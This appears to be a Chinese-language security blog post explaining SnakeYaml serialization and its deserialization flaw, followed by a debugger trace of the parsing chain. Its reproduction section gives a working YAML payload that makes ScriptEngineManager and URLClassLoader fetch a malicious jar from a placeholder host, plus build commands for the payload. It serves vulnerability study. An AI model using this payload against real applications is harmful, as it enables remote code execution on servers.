<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 7.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="什么是SnakeYaml？snakeyaml包主要用来解析yaml格式的内容，yaml语言比普通的xml与properties等配置文件的可读性更高，像是Spring系列就支持yaml的配置文件，而SnakeYaml是一个完整的YAML1.1规范Processor，支持UTF-8&#x2F;UTF-16，支持Java对象的序列化&#x2F;反序列化，支持所有YAML定义的类型。 语法参考：http">
<meta property="og:type" content="article">
<meta property="og:title" content="SnakeYaml反序列化">
<meta property="og:url" content="http://example.com/2023/08/20/SnakeYaml%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/index.html">
<meta property="og:site_name" content="ycxlo&#39;s Blog">
<meta property="og:description" content="什么是SnakeYaml？snakeyaml包主要用来解析yaml格式的内容，yaml语言比普通的xml与properties等配置文件的可读性更高，像是Spring系列就支持yaml的配置文件，而SnakeYaml是一个完整的YAML1.1规范Processor，支持UTF-8&#x2F;UTF-16，支持Java对象的序列化&#x2F;反序列化，支持所有YAML定义的类型。 语法参考：http">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://ilikeoyt.github.io/image/syaml1.png">
<meta property="og:image" content="https://ilikeoyt.github.io/image/syaml2.png">
<meta property="og:image" content="https://ilikeoyt.github.io/image/syaml3.png">
<meta property="og:image" content="https://ilikeoyt.github.io/image/syaml4.png">
<meta property="og:image" content="https://ilikeoyt.github.io/image/syaml5.png">
<meta property="og:image" content="https://ilikeoyt.github.io/image/syaml6.png">
<meta property="og:image" content="https://ilikeoyt.github.io/image/syaml7.png">
<meta property="og:image" content="https://ilikeoyt.github.io/image/s.png">
<meta property="og:image" content="https://ilikeoyt.github.io/image/syaml8.png">
<meta property="og:image" content="https://ilikeoyt.github.io/image/syaml9.png">
<meta property="og:image" content="https://ilikeoyt.github.io/image/syaml10.png">
<meta property="og:image" content="https://ilikeoyt.github.io/image/syaml11.png">
<meta property="og:image" content="https://ilikeoyt.github.io/image/syaml13.png">
<meta property="og:image" content="https://ilikeoyt.github.io/image/syaml14.png">
<meta property="og:image" content="https://ilikeoyt.github.io/image/syaml15.png">
<meta property="og:image" content="https://ilikeoyt.github.io/image/syaml16.png">
<meta property="og:image" content="https://ilikeoyt.github.io/image/syaml17.png">
<meta property="article:published_time" content="2023-08-20T03:12:39.000Z">
<meta property="article:modified_time" content="2025-05-25T03:35:25.211Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://ilikeoyt.github.io/image/syaml1.png">

<link rel="canonical" href="http://example.com/2023/08/20/SnakeYaml%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>SnakeYaml反序列化 | ycxlo's Blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">ycxlo's Blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2023/08/20/SnakeYaml%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="John Doe">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="ycxlo's Blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          SnakeYaml反序列化
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2023-08-20 11:12:39" itemprop="dateCreated datePublished" datetime="2023-08-20T11:12:39+08:00">2023-08-20</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2025-05-25 11:35:25" itemprop="dateModified" datetime="2025-05-25T11:35:25+08:00">2025-05-25</time>
              </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h2 id="什么是SnakeYaml？"><a href="#什么是SnakeYaml？" class="headerlink" title="什么是SnakeYaml？"></a>什么是SnakeYaml？</h2><p>snakeyaml包主要用来解析yaml格式的内容，yaml语言比普通的xml与properties等配置文件的可读性更高，像是Spring系列就支持yaml的配置文件，而SnakeYaml是一个完整的YAML1.1规范Processor，支持UTF-8&#x2F;UTF-16，支持Java对象的序列化&#x2F;反序列化，支持所有YAML定义的类型。</p>
<p>语法参考：<a target="_blank" rel="noopener" href="https://www.yiibai.com/yaml">https://www.yiibai.com/yaml</a></p>
<span id="more"></span>

<h2 id="SnakeYaml序列化与反序列化"><a href="#SnakeYaml序列化与反序列化" class="headerlink" title="SnakeYaml序列化与反序列化"></a>SnakeYaml序列化与反序列化</h2><p>依赖如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;dependency&gt;</span><br><span class="line">    &lt;groupId&gt;org.yaml&lt;/groupId&gt;</span><br><span class="line">    &lt;artifactId&gt;snakeyaml&lt;/artifactId&gt;</span><br><span class="line">    &lt;version&gt;1.27&lt;/version&gt;</span><br><span class="line">&lt;/dependency&gt;</span><br></pre></td></tr></table></figure>

<h2 id="常用方法"><a href="#常用方法" class="headerlink" title="常用方法"></a>常用方法</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">String	dump(Object data)</span><br><span class="line">将Java对象序列化为YAML字符串。</span><br><span class="line">void	dump(Object data, Writer output)</span><br><span class="line">将Java对象序列化为YAML流。</span><br><span class="line">String	dumpAll(Iterator&lt;? extends Object&gt; data)</span><br><span class="line">将一系列Java对象序列化为YAML字符串。</span><br><span class="line">void	dumpAll(Iterator&lt;? extends Object&gt; data, Writer output)</span><br><span class="line">将一系列Java对象序列化为YAML流。</span><br><span class="line">String	dumpAs(Object data, Tag rootTag, DumperOptions.FlowStyle flowStyle)</span><br><span class="line">将Java对象序列化为YAML字符串。</span><br><span class="line">String	dumpAsMap(Object data)</span><br><span class="line">将Java对象序列化为YAML字符串。</span><br><span class="line">&lt;T&gt; T	load(InputStream io)</span><br><span class="line">解析流中唯一的YAML文档，并生成相应的Java对象。</span><br><span class="line">&lt;T&gt; T	load(Reader io)</span><br><span class="line">解析流中唯一的YAML文档，并生成相应的Java对象。</span><br><span class="line">&lt;T&gt; T	load(String yaml)</span><br><span class="line">解析字符串中唯一的YAML文档，并生成相应的Java对象。</span><br><span class="line">Iterable&lt;Object&gt;	loadAll(InputStream yaml)</span><br><span class="line">解析流中的所有YAML文档，并生成相应的Java对象。</span><br><span class="line">Iterable&lt;Object&gt;	loadAll(Reader yaml)</span><br><span class="line">解析字符串中的所有YAML文档，并生成相应的Java对象。</span><br><span class="line">Iterable&lt;Object&gt;	loadAll(String yaml)</span><br><span class="line">解析字符串中的所有YAML文档，并生成相应的Java对象。</span><br></pre></td></tr></table></figure>

<p>主要关注序列化与反序列化<br>SnakeYaml提供了Yaml.dump()和Yaml.load()两个函数对yaml格式的数据进行序列化和反序列化。</p>
<ul>
<li>Yaml.load()：入参是一个字符串或者一个文件，经过序列化之后返回一个Java对象；</li>
<li>Yaml.dump()：将一个对象转化为yaml文件形式；</li>
</ul>
<h2 id="序列化"><a href="#序列化" class="headerlink" title="序列化"></a>序列化</h2><p>User类</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">public class User &#123;</span><br><span class="line">    public String name;</span><br><span class="line"></span><br><span class="line">    public void setName(String name) &#123;</span><br><span class="line">        this.name = name;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    public String getName() &#123;</span><br><span class="line">        return name;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>测试类</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">import org.yaml.snakeyaml.Yaml;</span><br><span class="line"></span><br><span class="line">public class SnakeYamlDemo &#123;</span><br><span class="line">    public static void main(String[] args) &#123;</span><br><span class="line">        User user = new User();</span><br><span class="line">        user.setName(&quot;ycxlo&quot;);</span><br><span class="line">        Yaml yaml = new Yaml();</span><br><span class="line">        String dump = yaml.dump(user);//序列化类对象为一个字符串</span><br><span class="line">        System.out.println(dump);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>输出结果：</p>
<p><img src="https://ilikeoyt.github.io/image/syaml1.png" alt="img"></p>
<p>这里的<code>!!</code>类似于fastjson中的<code>@type</code>用于指定反序列化的全类名</p>
<h2 id="反序列化"><a href="#反序列化" class="headerlink" title="反序列化"></a>反序列化</h2><p>再来一段User代码,主要是在各个方法中都添加了print，来看一下反序列化时会触发这个类的哪些方法</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line">public class User2 &#123;</span><br><span class="line"></span><br><span class="line">    String name;</span><br><span class="line">    int age;</span><br><span class="line"></span><br><span class="line">    public User2() &#123;</span><br><span class="line">        System.out.println(&quot;User构造函数&quot;);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    public String getName() &#123;</span><br><span class="line">        System.out.println(&quot;User.getName&quot;);</span><br><span class="line">        return name;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    public void setName(String name) &#123;</span><br><span class="line">        System.out.println(&quot;User.setName&quot;);</span><br><span class="line">        this.name = name;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    public int getAge() &#123;</span><br><span class="line">        System.out.println(&quot;User.getAge&quot;);</span><br><span class="line">        return age;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    public void setAge(int age) &#123;</span><br><span class="line">        System.out.println(&quot;User.setAge&quot;);</span><br><span class="line">        this.age = age;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>测试代码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">import org.yaml.snakeyaml.Yaml;</span><br><span class="line"></span><br><span class="line">public class SnakeYamlDemo &#123;</span><br><span class="line">    public static void main(String[] args) &#123;</span><br><span class="line">        User2 user = new User2();</span><br><span class="line">        user.setName(&quot;ycxlo&quot;);</span><br><span class="line">        user.setAge(18);</span><br><span class="line">        Yaml yaml = new Yaml();</span><br><span class="line">        String dump = yaml.dump(user);</span><br><span class="line">        System.out.println(dump);</span><br><span class="line">        String s = &quot;!!User2 &#123;age: 18, name: ycxlo&#125;&quot;;</span><br><span class="line">        yaml.load(s);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>运行结果：</p>
<p><img src="https://ilikeoyt.github.io/image/syaml2.png" alt="img"></p>
<p>可以看到，在序列化时触发了getter方法，在反序列化时触发了setter方法和构造方法</p>
<h2 id="SnakeYaml反序列化漏洞"><a href="#SnakeYaml反序列化漏洞" class="headerlink" title="SnakeYaml反序列化漏洞"></a>SnakeYaml反序列化漏洞</h2><h4 id="影响版本"><a href="#影响版本" class="headerlink" title="影响版本"></a>影响版本</h4><p>全版本</p>
<h4 id="漏洞原理"><a href="#漏洞原理" class="headerlink" title="漏洞原理"></a>漏洞原理</h4><p>yaml反序列化时可以通过<code>!!</code>+全类名指定反序列化的类，反序列化过程中会实例化该类，可以通过构造<code>ScriptEngineManager</code>payload并利用SPI机制通过<code>URLClassLoader</code>或者其他payload如JNDI方式远程加载实例化恶意类从而实现任意代码执行。</p>
<h4 id="漏洞复现"><a href="#漏洞复现" class="headerlink" title="漏洞复现"></a>漏洞复现</h4><p>网上最多的一个PoC就是基于javax.script.ScriptEngineManager的利用链通过URLClassLoader实现的代码执行。<a target="_blank" rel="noopener" href="https://github.com/artsploit/yaml-payload">github</a>上已经有现成的利用项目，可以更改好项目代码部署在web上即可。所以说SnakeYaml通常的一个利用条件是需要出网的<br>比如加一段弹计算器的代码<code>Runtime.getRuntime().exec(&quot;calc&quot;);</code></p>
<p><img src="https://ilikeoyt.github.io/image/syaml3.png" alt="img"></p>
<p>然后在该目录下将其打包成jar包，并启动http服务</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">javac src/artsploit/AwesomeScriptEngineFactory.java</span><br><span class="line">jar -cvf yaml-payload.jar -C src/ .</span><br></pre></td></tr></table></figure>

<p>由于我本机不知道怎么回事，poc访问不了，所以这里使用vps启动的http服务</p>
<p>修改poc</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">import org.yaml.snakeyaml.Yaml;</span><br><span class="line">import javax.script.ScriptEngineManager;</span><br><span class="line"></span><br><span class="line">public class SnakeYamlDemo &#123;</span><br><span class="line">    public static void main(String[] args) &#123;</span><br><span class="line">        String context = &quot;!!javax.script.ScriptEngineManager [\n&quot; +</span><br><span class="line">                &quot;  !!java.net.URLClassLoader [[\n&quot; +</span><br><span class="line">                &quot;    !!java.net.URL [\&quot;http://your_ip:9999/yaml-payload.jar\&quot;]\n&quot; +</span><br><span class="line">                &quot;  ]]\n&quot; +</span><br><span class="line">                &quot;]&quot;;</span><br><span class="line">        Yaml yaml = new Yaml();</span><br><span class="line">        yaml.load(context);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><img src="https://ilikeoyt.github.io/image/syaml4.png" alt="img"></p>
<h2 id="调试分析"><a href="#调试分析" class="headerlink" title="调试分析"></a>调试分析</h2><p>SPI会通过<code>java.util.ServiceLoder</code>进行动态加载实现，而在刚刚的exp的代码里面实现了<code>ScriptEngineFactory</code>并在<code>META-INF/services/</code> 里面添加了实现类的类名，而该类在静态代码块处是我们的执行命令的代码，而在调用的时候，SPI机制通过<code>Class.forName</code>反射加载并且<code>newInstance()</code>反射创建对象的时候，静态代码块进行执行，从而达到命令执行的目的。</p>
<p>首先在漏洞点处下个断点</p>
<p><img src="https://ilikeoyt.github.io/image/syaml5.png" alt="img"></p>
<p><img src="https://ilikeoyt.github.io/image/syaml6.png" alt="img"></p>
<p>讲我们传入的字符串以字节流形式读入，并调用loadFromReader方法，跟进</p>
<p><img src="https://ilikeoyt.github.io/image/syaml7.png" alt="img"></p>
<p>创建解析器，并调用了constructor.getSingleData方法</p>
<p><img src="https://ilikeoyt.github.io/image/s.png" alt="img"></p>
<p>节点赋值，将我们传入的字符串进行yaml语法解析，继续调用constructDocument方法，跟进</p>
<p><img src="https://ilikeoyt.github.io/image/syaml8.png" alt="img"></p>
<p>调用了constructObject方法</p>
<p><img src="https://ilikeoyt.github.io/image/syaml9.png" alt="img"></p>
<p>constructedObjects此时为空，肯定不满足if条件，跟进constructObjectNoCheck方法</p>
<p><img src="https://ilikeoyt.github.io/image/syaml10.png" alt="img"></p>
<p>将node的键值添加进recursiveObjects，并调用了constructor.construct方法，跟进</p>
<p><img src="https://ilikeoyt.github.io/image/syaml11.png" alt="img"></p>
<p>然后将node作为constructArray方法的参数传入，继续调用constructArrayStep2方法</p>
<p><img src="https://ilikeoyt.github.io/image/syaml13.png" alt="img"></p>
<p>child就是node中一个具体的类，这里是URL，调用constructObject方法</p>
<p><img src="https://ilikeoyt.github.io/image/syaml14.png" alt="img"></p>
<p>再次调用constructObjectNoCheck方法</p>
<p><img src="https://ilikeoyt.github.io/image/syaml15.png" alt="img"></p>
<p>继续调用另一个静态类的construct方法</p>
<p><img src="https://ilikeoyt.github.io/image/syaml16.png" alt="img"></p>
<p>继续调用getConstructor(node).construct(node)</p>
<p><img src="https://ilikeoyt.github.io/image/syaml17.png" alt="img"></p>
<p>前面部分是一些解析，最后将c变为了URL类，argumentList变为对应的值，进行实例化，产生漏洞，而后就是SPI机制解析其jar文件，造成命令执行</p>
<p><a target="_blank" rel="noopener" href="https://ilikeoyt.github.io/2023/08/15/jackson%E2%80%94CVE-2020-24616/"> jackson—CVE-2020-24616</a></p>
<p><a target="_blank" rel="noopener" href="https://ilikeoyt.github.io/2023/08/22/Hessian%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/">Hessian反序列化 </a></p>
<p>© 2024 ycxlo</p>
<p>Powered by <a target="_blank" rel="noopener" href="https://hexo.io/">Hexo</a> &amp; <a target="_blank" rel="noopener" href="https://muse.theme-next.org/">NexT.Muse</a></p>

    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2023/08/15/jackson%E2%80%94CVE-2020-24616/" rel="prev" title="jackson—CVE-2020-24616">
      <i class="fa fa-chevron-left"></i> jackson—CVE-2020-24616
    </a></div>
      <div class="post-nav-item">
    <a href="/2023/08/22/Hessian%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" rel="next" title="Hessian反序列化">
      Hessian反序列化 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%BB%80%E4%B9%88%E6%98%AFSnakeYaml%EF%BC%9F"><span class="nav-number">1.</span> <span class="nav-text">什么是SnakeYaml？</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#SnakeYaml%E5%BA%8F%E5%88%97%E5%8C%96%E4%B8%8E%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96"><span class="nav-number">2.</span> <span class="nav-text">SnakeYaml序列化与反序列化</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%B8%B8%E7%94%A8%E6%96%B9%E6%B3%95"><span class="nav-number">3.</span> <span class="nav-text">常用方法</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%BA%8F%E5%88%97%E5%8C%96"><span class="nav-number">4.</span> <span class="nav-text">序列化</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96"><span class="nav-number">5.</span> <span class="nav-text">反序列化</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#SnakeYaml%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E"><span class="nav-number">6.</span> <span class="nav-text">SnakeYaml反序列化漏洞</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%BD%B1%E5%93%8D%E7%89%88%E6%9C%AC"><span class="nav-number">6.0.1.</span> <span class="nav-text">影响版本</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86"><span class="nav-number">6.0.2.</span> <span class="nav-text">漏洞原理</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0"><span class="nav-number">6.0.3.</span> <span class="nav-text">漏洞复现</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%B0%83%E8%AF%95%E5%88%86%E6%9E%90"><span class="nav-number">7.</span> <span class="nav-text">调试分析</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">John Doe</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">59</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2025</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">John Doe</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
